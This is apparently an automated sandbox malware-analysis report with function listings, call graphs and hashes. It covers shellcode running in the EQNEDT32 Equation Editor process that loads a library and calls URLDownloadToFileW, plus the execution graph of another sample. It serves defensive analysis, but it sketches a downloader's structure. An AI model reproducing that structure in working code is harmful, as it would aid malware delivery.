                                                                            • Instruction ID: b58c80ab49252275e8bb25d24c45ca292ca05f046c2658837cd5494fd7c6962b
                                                                            • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                                                                            • Instruction Fuzzy Hash: A9F0FF5D90424622CB3CEB7889877EBAB51AF93351FCC8857E8D3042CAD56892C38269
                                                                            Function 03601822 Relevance: 1.6, APIs: 1, Instructions: 95libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 23 3601822-3601824 LoadLibraryW call 360183c 25 3601829-360182e 23->25 26 3601830-360189a call 360189b 25->26 27 360189e-36018af 25->27 26->27 29 36018b1 27->29 30 360191d-3601922 27->30 34 36018b3-36018b4 29->34 35 360191c 29->35 32 3601924-3601928 call 3601935 30->32 33 3601948-360194c 30->33 37 360192a-360192c 32->37 36 36018b6-36018df call 36018e6 34->36 34->37 35->30 42 360191b 36->42 37->42 43 360192e-3601932 37->43 42->35
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32 ref: 03601822
                                                                              • Part of subcall function 0360183C: URLDownloadToFileW.URLMON(00000000,0360184D,?,00000000,00000000), ref: 0360189D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.427253488.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                            Similarity
                                                                            • API ID: DownloadFileLibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 2776762486-0
                                                                            • Opcode ID: 191eaff5d62e3f1361c8487c46178be6edd8ee0561e645aa6f8810dde95707f6
                                                                            • Instruction ID: 63619fd720018f1c2ad32be7b6a016a7cc5c59e7ca8b9fe2374b260d10709fa7
                                                                            • Opcode Fuzzy Hash: 191eaff5d62e3f1361c8487c46178be6edd8ee0561e645aa6f8810dde95707f6
                                                                            • Instruction Fuzzy Hash: 8C318D6940C3C52FC71AD7604DABBA6BF656B93314F1C8ACEE4C10E1E3E3689602C756
                                                                            Function 0360183C Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 53 360183c 54 360183f-3601847 53->54 55 360184d-36018af 54->55 56 3601848 call 360189b 54->56 66 36018b1 55->66 67 360191d-3601922 55->67 56->55 70 36018b3-36018b4 66->70 71 360191c 66->71 68 3601924-3601928 call 3601935 67->68 69 3601948-360194c 67->69 73 360192a-360192c 68->73 72 36018b6-36018df call 36018e6 70->72 70->73 71->67 76 360191b 72->76 73->76 77 360192e-3601932 73->77 76->71
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.427253488.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                            Similarity
                                                                            • API ID: DownloadFile
                                                                            • String ID:
                                                                            • API String ID: 1407266417-0
                                                                            • Opcode ID: f29df95d9a18c321981f5fff7f293e617125a0b35ad74671cee5925c83681e80
                                                                            • Instruction ID: 4abb063192d63a7b7dcf567e606e535a3b6e7df8f8384d77df3a1ee6b320c50e
                                                                            • Opcode Fuzzy Hash: f29df95d9a18c321981f5fff7f293e617125a0b35ad74671cee5925c83681e80
                                                                            • Instruction Fuzzy Hash: A8115E6984C3C52BC72AD7704DABB56BF656B53604F1CCACEA1C50E0E3A3A89201C646
                                                                            Function 0360189B Relevance: 1.5, APIs: 1, Instructions: 27filenetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 81 360189b-360189f URLDownloadToFileW call 36018b8 83 36018a4-36018af 81->83 84 36018b1 83->84 85 360191d-3601922 83->85 88 36018b3-36018b4 84->88 89 360191c 84->89 86 3601924-3601928 call 3601935 85->86 87 3601948-360194c 85->87 91 360192a-360192c 86->91 90 36018b6-36018df call 36018e6 88->90 88->91 89->85 94 360191b 90->94 91->94 95 360192e-3601932 91->95 94->89
                                                                            APIs
                                                                            • URLDownloadToFileW.URLMON(00000000,0360184D,?,00000000,00000000), ref: 0360189D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.427253488.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                            Similarity
                                                                            • API ID: DownloadFile
                                                                            • String ID:
                                                                            • API String ID: 1407266417-0
                                                                            • Opcode ID: c3724f465438621bf03841c99be26e38eb38b75d7c5886b97db37e05723a6adc
                                                                            • Instruction ID: aaabe50f673c18797a4bdc8ca6f3f1b0c39b5334a7cbbeeefc2394ca0c679d41
                                                                            • Opcode Fuzzy Hash: c3724f465438621bf03841c99be26e38eb38b75d7c5886b97db37e05723a6adc
                                                                            • Instruction Fuzzy Hash: 07E0D87858830136E628F7908D87F5BB6699BC3F50F20874CF3A11E1D1B2E4A7088555
                                                                            Function 03601906 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 99 3601906-360190b ExitProcess 101 3601941-3601944 99->101 102 3601946-3601949 101->102 103 360197f 101->103 104 3601974-360197d 102->104 105 360194b-360194f 102->105 106 3601982-3601983 103->106 104->101 108 3601951-3601955 105->108 109 3601957-360195b 105->109 108->109 110 3601963-360196a 108->110 111 3601970-3601972 109->111 112 360195d-3601961 109->112 113 360196c 110->113 114 360196e 110->114 111->106 112->110 112->111 113->111 114->104
                                                                            APIs
                                                                            • ExitProcess.KERNEL32(00000000,?,036018FA,?,036018DE), ref: 0360190B
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.427253488.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                            • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                                            • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                            • Instruction Fuzzy Hash:
                                                                            Function 0360190D Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 115 360190d-3601918 GetPEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.427253488.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d66d3eda1ef59322e4862fe7bce6ac3608438173313f0ae18d6122f1e409d4e8
                                                                            • Instruction ID: 96ab6f2e8ecb871bde7af38350253df8620d4ee466ad751ab99aad78215f9523
                                                                            • Opcode Fuzzy Hash: d66d3eda1ef59322e4862fe7bce6ac3608438173313f0ae18d6122f1e409d4e8
                                                                            • Instruction Fuzzy Hash: A9A001752529858BD252CB09C990B02F37AFBC8A55F28C754C40947B1A9238E9568994

                                                                            Execution Graph

                                                                            Execution Coverage:3.4%
                                                                            Dynamic/Decrypted Code Coverage:1.1%
                                                                            Signature Coverage:3.1%
                                                                            Total number of Nodes:1663
                                                                            Total number of Limit Nodes:60
                                                                            execution_graph 80941 4444e4 80946 40d900 80941->80946 80943 4444ee 80950 43723d 80943->80950 80945 444504 80947 40d917 80946->80947 80948 40d909 80946->80948 80947->80948 80949 40d91c CloseHandle 80947->80949 80948->80943 80949->80943 80951 40d900 CloseHandle 80950->80951 80952 437247 ctype 80951->80952 80952->80945 80953 409340 80954 409386 80953->80954 80980 409395 80953->80980 80986 4042f0 80954->80986 80957 42fba9 80999 45e62e 118 API calls 3 library calls 80957->80999 80959 42fc07 81001 45e62e 118 API calls 3 library calls 80959->81001 80961 42fc85 81003 4781ae 142 API calls 80961->81003 80963 42fcd8 81005 47f2b4 176 API calls 80963->81005 80965 42fd4f 80967 4092c0 VariantClear 80965->80967 80985 409484 ctype 80967->80985 80968 42fc9c 80968->80985 81004 45e62e 118 API calls 3 library calls 80968->81004 80969 42fd39 81007 45e62e 118 API calls 3 library calls 80969->81007 80971 42fce9 80971->80985 81006 45e62e 118 API calls 3 library calls 80971->81006 80973 40946f 80992 409210 VariantClear 80973->80992 80974 40947b 80993 4092c0 80974->80993 80976 4094c1 80976->80985 80997 404260 78 API calls 80976->80997 80980->80957 80980->80959 80980->80961 80980->80963 80980->80965 80980->80969 80980->80973 80980->80974 80980->80976 80982 4092c0 VariantClear 80980->80982 80980->80985 80998 453155 77 API calls 80980->80998 81000 40c620 120 API calls 80980->81000 81002 45e62e 118 API calls 3 library calls 80980->81002 80982->80980 80983 4094e1 80984 4092c0 VariantClear 80983->80984 80984->80985 80987 404304 80986->80987 80991 40431c 80986->80991 80987->80991 81008 40c060 80987->81008 80991->80980 80992->80974 80994 4092c8 ctype 80993->80994 80995 429db0 VariantClear 80994->80995 80996 4092d5 ctype 80994->80996 80995->80996 80996->80985 80997->80983 80998->80980 80999->80985 81000->80980 81001->80985 81002->80980 81003->80968 81004->80985 81005->80971 81006->80985 81007->80965 81016 41171a 81008->81016 81011 41171a 77 API calls 81012 404561 81011->81012 81013 411421 81012->81013 81058 4113e5 81013->81058 81015 41142e 81015->80991 81018 411724 81016->81018 81019 40c088 81018->81019 81024 411740 std::bad_alloc::bad_alloc 81018->81024 81028 4138ba 81018->81028 81046 411afc 7 API calls __decode_pointer 81018->81046 81019->81011 81021 411766 81047 4116fd 69 API calls std::exception::exception 81021->81047 81023 411770 81048 41805b RaiseException 81023->81048 81024->81021 81025 411421 __cinit 76 API calls 81024->81025 81025->81021 81027 41177e 81029 41396d 81028->81029 81030 4138cc 81028->81030 81056 411afc 7 API calls __decode_pointer 81029->81056 81037 413929 RtlAllocateHeap 81030->81037 81039 4138dd 81030->81039 81040 413959 81030->81040 81043 41395e 81030->81043 81045 413965 81030->81045 81052 41386b 69 API calls 4 library calls 81030->81052 81053 411afc 7 API calls __decode_pointer 81030->81053 81032 413973 81057 417f23 69 API calls __getptd_noexit 81032->81057 81037->81030 81039->81030 81049 418252 69 API calls 2 library calls 81039->81049 81050 4180a7 69 API calls 7 library calls 81039->81050 81051 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 81039->81051 81054 417f23 69 API calls __getptd_noexit 81040->81054 81055 417f23 69 API calls __getptd_noexit 81043->81055 81045->81018 81046->81018 81047->81023 81048->81027 81049->81039 81050->81039 81052->81030 81053->81030 81054->81043 81055->81045 81056->81032 81057->81045 81059 4113f1 _fseek 81058->81059 81066 41181b 81059->81066 81065 411412 _fseek 81065->81015 81092 418407 81066->81092 81068 4113f6 81069 4112fa 81068->81069 81157 4169e9 TlsGetValue 81069->81157 81072 4169e9 __decode_pointer 7 API calls 81073 41131e 81072->81073 81082 4113a1 81073->81082 81169 4170e7 70 API calls 5 library calls 81073->81169 81075 41133c 81078 411357 81075->81078 81079 411366 81075->81079 81088 411388 81075->81088 81076 41696e __encode_pointer 7 API calls 81077 411396 81076->81077 81080 41696e __encode_pointer 7 API calls 81077->81080 81170 417047 75 API calls _realloc 81078->81170 81079->81082 81083 411360 81079->81083 81080->81082 81089 41141b 81082->81089 81083->81079 81085 41137c 81083->81085 81171 417047 75 API calls _realloc 81083->81171 81172 41696e TlsGetValue 81085->81172 81086 411376 81086->81082 81086->81085 81088->81076 81186 411824 81089->81186 81093 41841c 81092->81093 81094 41842f EnterCriticalSection 81092->81094 81099 418344 81093->81099 81094->81068 81096 418422 81096->81094 81127 4117af 69 API calls 3 library calls 81096->81127 81098 41842e 81098->81094 81100 418350 _fseek 81099->81100 81101 418360 81100->81101 81102 418378 81100->81102 81128 418252 69 API calls 2 library calls 81101->81128 81110 418386 _fseek 81102->81110 81131 416fb6 81102->81131 81105 418365 81129 4180a7 69 API calls 7 library calls 81105->81129 81108 4183a7 81113 418407 __lock 69 API calls 81108->81113 81109 418398 81137 417f23 69 API calls __getptd_noexit 81109->81137 81110->81096 81111 41836c 81130 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 81111->81130 81115 4183ae 81113->81115 81117 4183e2 81115->81117 81118 4183b6 81115->81118 81119 413a88 __mtterm 69 API calls 81117->81119 81138 4189e6 InitializeCriticalSectionAndSpinCount _fseek 81118->81138 81121 4183d3 81119->81121 81153 4183fe LeaveCriticalSection _doexit 81121->81153 81122 4183c1 81122->81121 81139 413a88 81122->81139 81125 4183cd 81152 417f23 69 API calls __getptd_noexit 81125->81152 81127->81098 81128->81105 81129->81111 81133 416fbf 81131->81133 81132 4138ba _malloc 68 API calls 81132->81133 81133->81132 81134 416ff5 81133->81134 81135 416fd6 Sleep 81133->81135 81134->81108 81134->81109 81136 416feb 81135->81136 81136->81133 81136->81134 81137->81110 81138->81122 81141 413a94 _fseek 81139->81141 81140 413b0d __dosmaperr _fseek 81140->81125 81141->81140 81143 418407 __lock 67 API calls 81141->81143 81151 413ad3 81141->81151 81142 413ae8 HeapFree 81142->81140 81144 413afa 81142->81144 81148 413aab ___sbh_find_block 81143->81148 81156 417f23 69 API calls __getptd_noexit 81144->81156 81146 413aff GetLastError 81146->81140 81147 413ac5 81155 413ade LeaveCriticalSection _doexit 81147->81155 81148->81147 81154 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 81148->81154 81151->81140 81151->81142 81152->81121 81153->81110 81154->81147 81155->81151 81156->81146 81158 416a01 81157->81158 81159 416a22 GetModuleHandleW 81157->81159 81158->81159 81160 416a0b TlsGetValue 81158->81160 81161 416a32 81159->81161 81162 416a3d GetProcAddress 81159->81162 81166 416a16 81160->81166 81184 41177f Sleep GetModuleHandleW 81161->81184 81168 416a1a 81162->81168 81164 41130e 81164->81072 81165 416a4d RtlDecodePointer 81165->81164 81166->81159 81166->81168 81167 416a38 81167->81162 81167->81164 81168->81164 81168->81165 81169->81075 81170->81083 81171->81086 81173 4169a7 GetModuleHandleW 81172->81173 81174 416986 81172->81174 81175 4169c2 GetProcAddress 81173->81175 81176 4169b7 81173->81176 81174->81173 81177 416990 TlsGetValue 81174->81177 81183 41699f 81175->81183 81185 41177f Sleep GetModuleHandleW 81176->81185 81179 41699b 81177->81179 81179->81173 81179->81183 81180 4169bd 81180->81175 81182 4169da 81180->81182 81181 4169d2 RtlEncodePointer 81181->81182 81182->81088 81183->81181 81183->81182 81184->81167 81185->81180 81189 41832d LeaveCriticalSection 81186->81189 81188 411420 81188->81065 81189->81188 81190 40b380 81191 40b3a5 81190->81191 81192 40b53d 81190->81192 81193 430a99 81191->81193 81199 40b3b6 81191->81199 81214 45e62e 118 API calls 3 library calls 81192->81214 81215 45e62e 118 API calls 3 library calls 81193->81215 81196 430aae 81201 4092c0 VariantClear 81196->81201 81197 40b528 81199->81196 81202 40b3f2 81199->81202 81210 40b4fd ctype 81199->81210 81200 430dc9 81200->81200 81201->81197 81203 40b429 81202->81203 81204 430ae9 VariantClear 81202->81204 81212 40b476 ctype 81202->81212 81213 40b43b ctype 81203->81213 81216 40e380 VariantClear ctype 81203->81216 81204->81213 81205 430d41 VariantClear 81205->81210 81206 40b4eb 81206->81210 81217 40e380 VariantClear ctype 81206->81217 81208 41171a 77 API calls 81208->81212 81210->81197 81218 45e62e 118 API calls 3 library calls 81210->81218 81211 430d08 ctype 81211->81205 81211->81210 81212->81206 81212->81211 81213->81208 81213->81212 81214->81193 81215->81196 81216->81213 81217->81210 81218->81200 81219 4169e0 81220 41696e __encode_pointer 7 API calls 81219->81220 81221 4169e7 81220->81221 81222 444343 81225 444326 81222->81225 81224 44434e WriteFile 81226 444340 81225->81226 81227 4442c7 81225->81227 81226->81224 81232 40e190 SetFilePointerEx 81227->81232 81229 4442e0 SetFilePointerEx 81233 40e190 SetFilePointerEx 81229->81233 81231 4442ff 81231->81224 81232->81229 81233->81231 81234 46d22f 81237 46d098 81234->81237 81236 46d241 81238 46d0b5 81237->81238 81239 46d115 81238->81239 81240 46d0b9 81238->81240 81288 45c216 80 API calls 81239->81288 81241 41171a 77 API calls 81240->81241 81243 46d0c0 81241->81243 81245 46d0cc 81243->81245 81281 40d940 78 API calls 81243->81281 81244 46d126 81246 46d0f8 81244->81246 81252 46d142 81244->81252 81282 453063 81245->81282 81247 4092c0 VariantClear 81246->81247 81249 46d0fd 81247->81249 81249->81236 81253 46d1c8 81252->81253 81256 46d158 81252->81256 81301 4676a3 80 API calls 81253->81301 81259 453063 113 API calls 81256->81259 81257 46d0ea 81257->81252 81260 46d0ee 81257->81260 81258 46d1ce 81302 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 81258->81302 81268 46d15e 81259->81268 81260->81246 81287 44ade5 CloseHandle ctype 81260->81287 81261 46d18d 81289 467fce 84 API calls 81261->81289 81265 46d196 81290 4013a0 81265->81290 81266 46d1e7 81270 4092c0 VariantClear 81266->81270 81280 46d194 81266->81280 81268->81261 81268->81265 81270->81280 81274 46d224 81274->81236 81275 40d900 CloseHandle 81277 46d216 81275->81277 81276 46d1b8 81300 467fce 84 API calls 81276->81300 81303 44ade5 CloseHandle ctype 81277->81303 81280->81274 81280->81275 81281->81245 81283 45306e 81282->81283 81284 45307a 81282->81284 81283->81284 81304 452e2a 113 API calls 5 library calls 81283->81304 81286 40dfa0 85 API calls 81284->81286 81286->81257 81287->81246 81288->81244 81289->81280 81291 41171a 77 API calls 81290->81291 81292 4013c4 81291->81292 81305 401380 81292->81305 81295 40df50 81296 40df61 81295->81296 81297 40df56 81295->81297 81299 40d3b0 77 API calls 2 library calls 81296->81299 81308 404080 77 API calls _memcpy_s 81297->81308 81299->81276 81300->81280 81301->81258 81302->81266 81303->81274 81304->81284 81306 41171a 77 API calls 81305->81306 81307 401387 81306->81307 81307->81295 81308->81296 81309 3a45528 81323 3a43178 81309->81323 81311 3a455fe 81326 3a45418 81311->81326 81313 3a45627 CreateFileW 81315 3a45676 81313->81315 81316 3a4567b 81313->81316 81316->81315 81317 3a45692 VirtualAlloc 81316->81317 81317->81315 81318 3a456b0 ReadFile 81317->81318 81318->81315 81319 3a456cb 81318->81319 81320 3a44418 12 API calls 81319->81320 81321 3a456fe 81320->81321 81322 3a45721 ExitProcess 81321->81322 81322->81315 81329 3a46628 GetPEB 81323->81329 81325 3a43803 81325->81311 81327 3a45421 Sleep 81326->81327 81328 3a4542f 81327->81328 81330 3a46652 81329->81330 81330->81325 81331 40116e 81332 401119 DefWindowProcW 81331->81332 81333 429212 81338 410b90 81333->81338 81336 411421 __cinit 76 API calls 81337 42922f 81336->81337 81339 410b9a __write_nolock 81338->81339 81340 41171a 77 API calls 81339->81340 81341 410c31 GetModuleFileNameW 81340->81341 81355 413db0 81341->81355 81343 410c66 _wcsncat 81358 413e3c 81343->81358 81346 41171a 77 API calls 81347 410ca3 _wcscpy 81346->81347 81348 410cd1 RegOpenKeyExW 81347->81348 81349 429bc3 RegQueryValueExW 81348->81349 81350 410cf7 81348->81350 81351 429cd9 RegCloseKey 81349->81351 81353 429bf2 _wcscat _wcslen _wcsncpy 81349->81353 81350->81336 81352 41171a 77 API calls 81352->81353 81353->81352 81354 429cd8 81353->81354 81354->81351 81361 413b95 81355->81361 81391 41abec 81358->81391 81362 413c2f 81361->81362 81368 413bae 81361->81368 81363 413d60 81362->81363 81364 413d7b 81362->81364 81387 417f23 69 API calls __getptd_noexit 81363->81387 81389 417f23 69 API calls __getptd_noexit 81364->81389 81367 413d65 81372 413cfb 81367->81372 81388 417ebb 7 API calls 2 library calls 81367->81388 81368->81362 81377 413c1d 81368->81377 81383 41ab19 69 API calls __vswprintf_l 81368->81383 81371 413d03 81371->81362 81371->81372 81374 413d8e 81371->81374 81372->81343 81373 413cb9 81373->81362 81375 413cd6 81373->81375 81385 41ab19 69 API calls __vswprintf_l 81373->81385 81390 41ab19 69 API calls __vswprintf_l 81374->81390 81375->81362 81375->81372 81379 413cef 81375->81379 81377->81362 81382 413c9b 81377->81382 81384 41ab19 69 API calls __vswprintf_l 81377->81384 81386 41ab19 69 API calls __vswprintf_l 81379->81386 81382->81371 81382->81373 81383->81377 81384->81382 81385->81375 81386->81372 81387->81367 81389->81367 81390->81372 81392 41ac02 81391->81392 81393 41abfd 81391->81393 81400 417f23 69 API calls __getptd_noexit 81392->81400 81393->81392 81394 41ac22 81393->81394 81399 410c99 81394->81399 81402 417f23 69 API calls __getptd_noexit 81394->81402 81396 41ac07 81401 417ebb 7 API calls 2 library calls 81396->81401 81399->81346 81400->81396 81402->81396 81403 409030 81417 409110 119 API calls 81403->81417 81405 42ceb6 81427 410ae0 VariantClear ctype 81405->81427 81407 40906e 81407->81405 81409 42cea9 81407->81409 81411 4090a4 81407->81411 81408 42cebf 81426 45e62e 118 API calls 3 library calls 81409->81426 81418 404160 81411->81418 81414 4090f0 ctype 81415 4092c0 VariantClear 81416 4090be ctype 81415->81416 81416->81414 81416->81415 81417->81407 81419 4092c0 VariantClear 81418->81419 81420 40416e 81419->81420 81428 404120 81420->81428 81422 40419b 81432 4734b7 81422->81432 81476 40efe0 81422->81476 81423 4041c6 81423->81405 81423->81416 81426->81405 81427->81408 81429 40412e 81428->81429 81430 4092c0 VariantClear 81429->81430 81431 404138 81430->81431 81431->81422 81433 453063 113 API calls 81432->81433 81434 4734d7 81433->81434 81435 473545 81434->81435 81436 47350c 81434->81436 81484 463c42 81435->81484 81437 4092c0 VariantClear 81436->81437 81443 473514 81437->81443 81439 473558 81440 47355c 81439->81440 81457 473595 81439->81457 81442 4092c0 VariantClear 81440->81442 81441 473616 81497 463d7e 81441->81497 81450 473564 81442->81450 81443->81423 81445 453063 113 API calls 81445->81457 81446 473622 81447 473697 81446->81447 81448 47362c 81446->81448 81531 457838 81447->81531 81449 4092c0 VariantClear 81448->81449 81454 473634 81449->81454 81450->81423 81454->81423 81456 473655 81459 4092c0 VariantClear 81456->81459 81457->81441 81457->81445 81457->81456 81543 462f5a 89 API calls __wcsicoll 81457->81543 81471 47365d 81459->81471 81460 4736b0 81544 45e62e 118 API calls 3 library calls 81460->81544 81461 4736c9 81545 40e7e0 78 API calls 81461->81545 81464 4736ba GetCurrentProcess TerminateProcess 81464->81461 81465 4736db 81472 4736ff 81465->81472 81546 40d030 78 API calls 81465->81546 81467 473731 81473 473744 FreeLibrary 81467->81473 81474 47374b 81467->81474 81468 4736f1 81547 46b945 136 API calls 2 library calls 81468->81547 81471->81423 81472->81467 81548 40d030 78 API calls 81472->81548 81549 46b945 136 API calls 2 library calls 81472->81549 81473->81474 81474->81423 81477 40eff5 CreateFileW 81476->81477 81478 4299bf 81476->81478 81479 40f017 81477->81479 81478->81479 81480 4299c4 CreateFileW 81478->81480 81479->81423 81480->81479 81481 4299ea 81480->81481 81588 40e0d0 SetFilePointerEx SetFilePointerEx 81481->81588 81483 4299f5 81483->81479 81550 45335b 78 API calls 81484->81550 81486 463c5d 81551 442c52 82 API calls _wcslen 81486->81551 81488 463c72 81490 40c060 77 API calls 81488->81490 81496 463cac 81488->81496 81491 463c8e 81490->81491 81552 4608ce 77 API calls _memcpy_s 81491->81552 81493 463ca4 81553 40c740 81493->81553 81495 463cf7 81495->81439 81496->81495 81558 462f5a 89 API calls __wcsicoll 81496->81558 81498 453063 113 API calls 81497->81498 81499 463d99 81498->81499 81500 463de0 81499->81500 81501 463dca 81499->81501 81567 40c760 80 API calls 81500->81567 81566 453081 113 API calls 81501->81566 81504 463dd0 LoadLibraryW 81506 463e09 81504->81506 81505 463de7 81518 463e19 81505->81518 81568 40c760 80 API calls 81505->81568 81508 463e3e 81506->81508 81506->81518 81510 463e4e 81508->81510 81511 463e7b 81508->81511 81509 463dfb 81509->81518 81569 40c760 80 API calls 81509->81569 81570 40d500 81510->81570 81576 40c760 80 API calls 81511->81576 81516 463e82 GetProcAddress 81520 463e90 81516->81520 81518->81446 81519 463e62 GetProcAddress 81522 463e79 81519->81522 81520->81518 81521 463edf 81520->81521 81520->81522 81521->81518 81525 463eef FreeLibrary 81521->81525 81522->81520 81577 403470 77 API calls _memcpy_s 81522->81577 81524 463eb4 81526 40d500 77 API calls 81524->81526 81525->81518 81527 463ebd 81526->81527 81578 45efe7 79 API calls ctype 81527->81578 81529 463ec8 GetProcAddress 81579 401330 ctype 81529->81579 81532 457a4c 81531->81532 81533 45785f _strcat _wcslen _wcscpy ctype 81531->81533 81539 410d40 81532->81539 81533->81532 81534 443576 80 API calls 81533->81534 81535 40c760 80 API calls 81533->81535 81536 453081 113 API calls 81533->81536 81537 4138ba 69 API calls _malloc 81533->81537 81580 40f580 81533->81580 81534->81533 81535->81533 81536->81533 81537->81533 81541 410d55 81539->81541 81540 410ded VirtualProtect 81542 410dbb 81540->81542 81541->81540 81541->81542 81542->81460 81542->81461 81543->81457 81544->81464 81545->81465 81546->81468 81547->81472 81548->81472 81549->81472 81550->81486 81551->81488 81552->81493 81554 40c752 81553->81554 81555 40c747 81553->81555 81554->81496 81555->81554 81559 402ae0 81555->81559 81557 42a572 _memcpy_s 81557->81496 81558->81495 81560 42a06a 81559->81560 81561 402aef 81559->81561 81562 401380 77 API calls 81560->81562 81561->81557 81563 42a072 81562->81563 81564 41171a 77 API calls 81563->81564 81565 42a095 _memcpy_s 81564->81565 81565->81557 81566->81504 81567->81505 81568->81509 81569->81506 81571 41171a 77 API calls 81570->81571 81572 40d515 81571->81572 81573 41171a 77 API calls 81572->81573 81574 40d521 81573->81574 81575 45efe7 79 API calls ctype 81574->81575 81575->81519 81576->81516 81577->81524 81578->81529 81579->81521 81581 429440 81580->81581 81582 40f589 _wcslen 81580->81582 81583 40f58f WideCharToMultiByte 81582->81583 81584 40f5d8 81583->81584 81585 40f5ad 81583->81585 81584->81533 81586 41171a 77 API calls 81585->81586 81587 40f5bb WideCharToMultiByte 81586->81587 81587->81533 81588->81483 81589 4034b0 81590 4034b9 81589->81590 81591 4034bd 81589->81591 81592 42a0ba 81591->81592 81593 41171a 77 API calls 81591->81593 81594 4034fe _memcpy_s ctype 81593->81594 81595 416193 81632 41718c 81595->81632 81597 41619f GetStartupInfoW 81599 4161c2 81597->81599 81633 41aa31 HeapCreate 81599->81633 81601 416212 81635 416e29 GetModuleHandleW 81601->81635 81605 416223 __RTC_Initialize 81669 41b669 81605->81669 81608 416231 81609 41623d GetCommandLineW 81608->81609 81738 4117af 69 API calls 3 library calls 81608->81738 81684 42235f GetEnvironmentStringsW 81609->81684 81612 41624c 81690 4222b1 GetModuleFileNameW 81612->81690 81613 41623c 81613->81609 81615 416256 81616 416261 81615->81616 81739 4117af 69 API calls 3 library calls 81615->81739 81694 422082 81616->81694 81620 416272 81707 41186e 81620->81707 81623 416279 81625 416284 __wwincmdln 81623->81625 81741 4117af 69 API calls 3 library calls 81623->81741 81713 40d7f0 81625->81713 81628 4162b3 81743 411a4b 69 API calls _doexit 81628->81743 81631 4162b8 _fseek 81632->81597 81634 416206 81633->81634 81634->81601 81736 41616a 69 API calls 3 library calls 81634->81736 81636 416e44 81635->81636 81637 416e3d 81635->81637 81639 416fac 81636->81639 81640 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81636->81640 81744 41177f Sleep GetModuleHandleW 81637->81744 81754 416ad5 72 API calls 2 library calls 81639->81754 81642 416e97 TlsAlloc 81640->81642 81641 416e43 81641->81636 81645 416218 81642->81645 81646 416ee5 TlsSetValue 81642->81646 81645->81605 81737 41616a 69 API calls 3 library calls 81645->81737 81646->81645 81647 416ef6 81646->81647 81745 411a69 7 API calls 4 library calls 81647->81745 81649 416efb 81650 41696e __encode_pointer 7 API calls 81649->81650 81651 416f06 81650->81651 81652 41696e __encode_pointer 7 API calls 81651->81652 81653 416f16 81652->81653 81654 41696e __encode_pointer 7 API calls 81653->81654 81655 416f26 81654->81655 81656 41696e __encode_pointer 7 API calls 81655->81656 81657 416f36 81656->81657 81746 41828b InitializeCriticalSectionAndSpinCount __mtinitlocknum 81657->81746 81659 416f43 81659->81639 81660 4169e9 __decode_pointer 7 API calls 81659->81660 81661 416f57 81660->81661 81661->81639 81747 416ffb 81661->81747 81664 4169e9 __decode_pointer 7 API calls 81665 416f8a 81664->81665 81665->81639 81666 416f91 81665->81666 81753 416b12 69 API calls 5 library calls 81666->81753 81668 416f99 GetCurrentThreadId 81668->81645 81773 41718c 81669->81773 81671 41b675 GetStartupInfoA 81672 416ffb __calloc_crt 69 API calls 81671->81672 81678 41b696 81672->81678 81673 41b8b4 _fseek 81673->81608 81674 41b831 GetStdHandle 81683 41b7fb 81674->81683 81675 41b896 SetHandleCount 81675->81673 81676 416ffb __calloc_crt 69 API calls 81676->81678 81677 41b843 GetFileType 81677->81683 81678->81673 81678->81676 81679 41b77e 81678->81679 81678->81683 81679->81673 81680 41b7a7 GetFileType 81679->81680 81679->81683 81774 4189e6 InitializeCriticalSectionAndSpinCount _fseek 81679->81774 81680->81679 81683->81673 81683->81674 81683->81675 81683->81677 81775 4189e6 